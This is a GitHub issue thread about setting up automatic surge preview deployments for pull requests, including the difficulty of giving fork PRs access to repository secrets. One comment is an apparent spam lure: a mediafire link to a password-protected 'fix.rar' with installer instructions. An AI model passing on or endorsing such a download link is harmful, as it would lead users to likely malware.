### ISSUE TITLE
automatic deployment for PRs

### ISSUE THREAD

**Issue by alifeee** [lipu-tenpo/liputenpo.org#105]
it nearly works

it works fine on this repository (on the `staging-deployment-works-internally` tag) for internal PRs

it does not work yet for pull requests from forks, as these are funky

I need to set this up <https://github.com/actions/checkout/issues/518#issuecomment-1972009337> so that an action can both

- use the code from the forked PR (with `pull_request` event)
- use the secrets from this repository (with `pull_request_target` event)

(this is not something that github actions likes you doing)

alternatively, I could just tell forks that they should create their own secrets for `surge` and it will work for them

also, the `surge` step doesn't fail if the ENV variables `SURGE_LOGIN` and `SURGE_KEY` are unset. It should, then it would be obvious that it fails.

This sounds like a good compromise, and the action could report the URL in the same way that github pages reports the URL as an output

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by alifeee** [comment]
could write surge description in a contirbuting guide

**Comment by alifeee** [comment]
done, final commit is in 5ee5ff980ade18d53af4bc55d311613998063b85

**Comment by alifeee** [comment]
it just uses comments, not deployments, because there is no `ref` to use if the pull request comes from a fork
